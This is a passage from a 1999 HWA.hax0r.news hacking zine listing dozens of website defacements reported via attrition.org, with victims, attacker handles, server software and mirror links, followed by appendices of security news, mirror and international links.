Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.
>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
* Info supplied by the attrition.org mailing list.
Listed oldest to most recent...
Defaced domain: www.activedev.net
Site Title: Active Development
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.activedev.net
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.18, 99.12.15, 99.12.07 by acidklown, pyrostorm666, pyrostorm666
Potentially offensive content on defaced page.
Defaced domain: www.chegamais.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.chegamais.com
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: image1.ouhsc.edu
Site Title: University of Oklahoma Health Sciences Center
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/image1.ouhsc.edu
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.allianceenterprises.com
Site Title: Alliance Enterprises
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.allianceenterprises.com
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.firstgpa.com
Site Title: First American Gropu Purchasing Association
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.firstgpa.com
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.webdr.com
Site Title: The WEB Doctor
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.webdr.com
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.benthic.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.benthic.com
Defaced by: Wolf
Operating System: Irix (Rapidsite/Apa-1.3.4 FrontPage)
Potentially offensive content on defaced page.
Defaced domain: www.teddies4ever.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.teddies4ever.com
Defaced by: WKD
Operating System: Solaris
Defaced domain: www.harp-industries.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.harp-industries.
Defaced by: inkk
Operating System: Solaris 2.6 - 2.7
Potentially offensive content on defaced page.
Defaced domain: www.nsbrasil.org
Site Title: Melckzedeck Aquino de Aracjo
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.nsbrasil.org
Defaced by: Death Knights
Operating System: Linux (Apache 1.3.4)
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.
Defaced domain: www.alas.net
Site Title: Alexandre Simoes
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.alas.net
Defaced by: Death Knights
Operating System: Linux (Apache 1.3.4)
Potentially offensive content on defaced page.
Defaced domain: www.thsrock.net
Site Title: Trinity High School RockNet
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.thsrock.net
Defaced by: Pezzdc
Operating System: Windows NT (WebSitePro/2.3.15)
Previously defaced on 99.12.16 by f1ber
Potentially offensive content on defaced page.
Defaced domain: www.cm-lisboa.pt
Site Title: C�mara Municipal de Lisboa
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cm-lisboa.pt
Defaced by: F0rpaxe
Operating System: Windows NT
Attrition comment: This is the Web site for the Governor of Lisbon, the capital of Portugal
Defaced domain: eagles.eems.giles.k12.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: games.eesite.com
Site Title: Echelon Entertainment
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/games.eesite.com
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page
Defaced domain: cardserver.eesite.com
Site Title: Echelon Entertainment
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/cardserver.eesite.com
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.itaipu.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.itaipu.gov.br
Defaced by: inferno.br
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.torahacademy.org
Site Title: MTC Enterprises
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.torahacademy.org
Defaced by: unknown
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 by f1ber
Potentially offensive content on defaced page.
Defaced domain: www.smc.com.br
Site Title: SMC Internet Services
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.smc.com.br
Defaced by: Ass0mbracao
Operating System: Windows NT
Potentially offensive content on defaced page.
Defaced domain: sugok.chongju-e.ac.kr
Site Title: ChongJu National University of Education
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/sugok.chongju-e.ac.k
Defaced by: JvM
Operating System: Solaris 2.6
Potentially offensive content on defaced page.
Defaced domain: www.map.org
Site Title: MAP International
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.map.org
Defaced by: unknown
Operating System: Solaris 2.6 - 2.7
Previously defaced on by
Potentially offensive content on defaced page.
Defaced domain: www.arc.gov
Site Title: Appalachian Regional Commission
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.arc.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.fairus.org
Site Title: FAIR
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.fairus.
Defaced by: Ass0mbracao
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 99.12.18 by
Potentially offensive content on defaced page
Defaced domain: facepe.pe.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/facepe.pe.gov.br
Defaced by: Shadow
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cisco.net
Site Title: Cisco.Net
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cisco.net
Defaced by: Digital Domination
Operating System: Digital Unix (Apache/1.2.6 FrontPage/3.0.4)
Previously defaced on 99.12.19 by DD
Potentially offensive content on defaced page.
Defaced domain: eagles.eems.giles.k12.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us
Defaced by: acidklown
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.21 by Verb0
Potentially offensive content on defaced page.
Defaced domain: www.theisp.net
Site Title: Discovery Online, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.theisp.net
Defaced by: Uneek Tech
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.virtualshack.com
Site Title: virtualshack.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.virtualshack.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: members.geosoft.org
Site Title: The Geosoft Network
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/members.geosoft.org
Defaced by: HiP
Operating System: Windows NT (Apache 1.3.9 Win32)
Potentially offensive content on defaced page.
Defaced domain: www.thegolftravelcenter.com
Site Title: Randy Young (THEGOLFRAVELCENTER-DOM)
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.thegolftravelcenter.com
Defaced by: Ass0mbracao
Operating System: NT
Previously defaced on 99.12.19 by BLN
Potentially offensive content on defaced page.
Attrition comment: Also defaced www.smc.com.br
Defaced domain: www.contrast-clothing.com
Site Title: Contrast Clothing
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.contrast-clothing.com
Defaced by: unknown
Operating System: NT
HIDDEN comments in the HTML.
Defaced domain: www.oirm.bia.gov
Site Title: Office of Information Resources Management, Bureau of Indian Affairs
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.oirm.bia.gov
Defaced by: phiber
Operating System: Windows NT
Potentially offensive content on defaced page.
Defaced domain: www.cya.ca.gov
Site Title: California Department of Youth Authority
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cya.ca.gov
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.irr.bia.gov
Site Title: Indian Reservation Roads Program, Bureau of Indian Affairs
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.irr.bia.gov
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.ocf.anl.gov
Site Title: Office of the Chief Financial Officer, Argonne National Labs
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.ocf.anl.gov
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.calgold.ca.gov
Site Title: CalGOLD Business Permits
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.calgold.ca.gov
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.samaritan.org
Site Title: Samaritan's Purse
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.samaritan.org
Defaced by: B.L.Z. Bub
Operating System: NT
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.
Defaced domain: www.zenworksmaster.com
Site Title: ZENMaster
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.zenworksmaster.com
Defaced by: Ass0mbracao
Operating System: NT
Previously defaced on 99.12.19 by BLN
Potentially offensive content on defaced page.
Defaced domain: www.fmc.gov
Site Title: Federal Maritime Commission
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.fmc.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: democrats.assembly.ca.gov
Site Title: California State Assembly Democratic Caucus
Mirror:
http://www.attrition.org/mirror/attrition/1999/12/22/democrats.assembly.ca.gov/
Defaced by: phiber
Operating System: Windows NT
Defaced domain: www.taonline.com
Site Title: DI-USA, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.taonline.com
Defaced by: Pyrostorm666
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.pitt.ang.af.mil
Site Title: Air National Guard
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.pitt.ang.af.mil
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.laredo.k12.tx.us
Site Title: Texas K12 Schools
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.laredo.k12.tx.us
Defaced by: Ass0mbracao
Operating System: Windows NT or WFW 3.11
Previously defaced on 99.12.16 by f1ber
Potentially offensive content on defaced page
Defaced domain: www.dfi.ca.gov
Site Title: State of California
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.dfi.ca.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.h-c-v.org
Site Title: HCV
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.h-c-v.org
Defaced by: ezoons
Operating System: FreeBSD 2.2.1
Potentially offensive content on defaced page.
Defaced domain: www.upshq.com
Site Title: United Phreaks Syndicate
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.upshq.com
Defaced by: MOTHERFUCKER GRANDPA NIGZ
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cssc.gov
Site Title: Customer Systems Support Center
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cssc.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.jcomtraining.com
Site Title: JCom Computer Training
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.jcomtraining.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cascades-spa.com
Site Title: 2032272 Nova Scotia Ltd
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.cascades-spa.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.drkenner.com
Site Title: Dr. Harris Kenner
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.drkenner.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.lunarvision.com
Site Title: Lunar Video Communications
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lunarvision.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: cpma.apg.army.mil
Site Title: Army Signal Command
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/cpma.apg.army.mil
Defaced by: THESAINT666
Operating System: NT
Previously defaced on 99.12.04 by k-0s
Defaced domain: www.k9express.com
Site Title: RD&K Associated
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.k9express.com
Defaced by: BLN
Operating System: NT
Defaced domain: www.bankerusa.com
Site Title: Banker of USA Mortgage
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.bankerusa.com
Defaced by: THESAINT666
Operating System: Windows NT (IIS/3.0)
Previously defaced on 99.04.23 by tonekore
Potentially offensive content on defaced page.
Defaced domain: www.freezonez.com
Site Title: Blasie Tech
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.freezonez.com
Defaced by: wired
Operating System: FreeBSD (Apache 1.2.6)
Potentially offensive content on defaced page.
Defaced domain: www.infoctr.edu
Site Title: Library of International Relations
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.infoctr.edu
Defaced by: THESAINT666
Operating System: NT
Defaced domain: www.hotelsmexico.com
Site Title: Posadas de Mexico
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.hotelsmexico.com
Defaced by: THESAINT666
Operating System: NT
Defaced domain: www.leet-2000.com
Site Title: anastacio esteviz
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.leet-2000.com
Defaced by: styles
Operating System: BSDI (Apache 1.3.6)
Potentially offensive content on defaced page.
Defaced domain: www.expoente.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.expoente.com.br
Defaced by: Ass0mbracao/OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.10.19 and 99.12.11 by OHB and Death Knights
Potentially offensive content on defaced page.
Defaced domain: www.acommedia.com
Site Title: ACom Media Ltd
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.acommedia.com
Defaced by: phiber
Operating System: Red Hat Linux (Apache 1.3.3)
Potentially offensive content on defaced page.
Defaced domain: www.conagg.com
Site Title: Construction Aggregate Equipment Company
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.conagg.com
Defaced by: Unknown since their HTML called a bad image.
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.ndn.co.jp
Site Title: Nippon Data Net Limited Partnership
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.ndn.co.jp
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.03.05 99.10.31 99.10.29 by xoloth1 () DHC
Potentially offensive content on defaced page.
Defaced domain: www.lyon.k12.ky.us
Site Title: Kentucky K12 Schools
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lyon.k12.ky.us
Defaced by: PurpleHaze
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.gddc.pt
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.gddc.pt
Defaced by: Shandar
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cphv.org
Site Title: Center to Prevent Handgun Violence
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.cphv.org
Defaced by: Ass0mbracao
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 by Analognet
Potentially offensive content on defaced page.
Defaced domain: www.goprismatic.com
Site Title: Totally Bogus Men Company
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.goprismatic.com
Defaced by: #phreak.nl
Operating System: Linux (Apache 1.3.4)
Potentially offensive content on defaced page.
Defaced domain: www.sicily.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.sicily.navy.mil
Defaced by: THESAINT666
Operating System: Windows NT
Potentially offensive content on defaced page.
Defaced domain: www.ordermed.com
Site Title: ordermed
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.ordermed.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.mute300.net
Site Title: MUTE300
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.mute300.net
Defaced by: crack & crx
Operating System: FreeBSD (Apache 1.2.6)
Previously defaced on 99.11.17 by Sabu
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.
Defaced domain: www.domain-network.net
Site Title: BLAH
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.domain-network.net
Defaced by: wired
Operating System: FreeBSD (Apache 1.2.6)
Potentially offensive content on defaced page.
Defaced domain: www.inet.tsinghua.edu.cn
Site Title: Institute of Nuclear Energy Technology of Tsinghua University
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.inet.tsinghua.edu.cn
Defaced by: Bosnatek
Operating System: Solaris 2.5x
Potentially offensive content on defaced page.
Defaced domain: www.jadenterprises.com
Site Title: J.A.D. Enterprises Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.jadenterprises.com
Defaced by: w0lf
Operating System: Irix? (Rapidsite/Apa-1.3.4)
Potentially offensive content on defaced page.
Defaced domain: www.asiplc.com
Site Title: Automation Solutions, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.asiplc.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.webquestcom.com
Site Title: Conquest Communications, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.webquestcom.com
Defaced by: Rhallado
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.networkmediadevices.com
Site Title: Network Media Devices, Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.networkmediadevices.com
Defaced by: BOG
Operating System: Linux (Apache 1.3.6)
Potentially offensive content on defaced page.
Defaced domain: www.colella.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.colella.com.br
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.planet3000.com
Site Title: Sebastian Harrison
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.planet3000.com
Defaced by: Rhallado
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cafepiupiu.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.cafepiupiu.com.br
Defaced by: hts & white_course
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.presbycoalition.org
Site Title: The Presbyterian Coalition
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.presbycoalition.org
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.vvs-online.com
Site Title: V.V.S. bvba
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.vvs-online.com
Defaced by: illusions team
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page
Defaced domain: www.imagemine.com
Site Title: imagemine
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.imagemine.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.tdicomputers.com
Site Title: Aerodiam nv
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.tdicomputers.com
Defaced by: illusions team
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
� 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]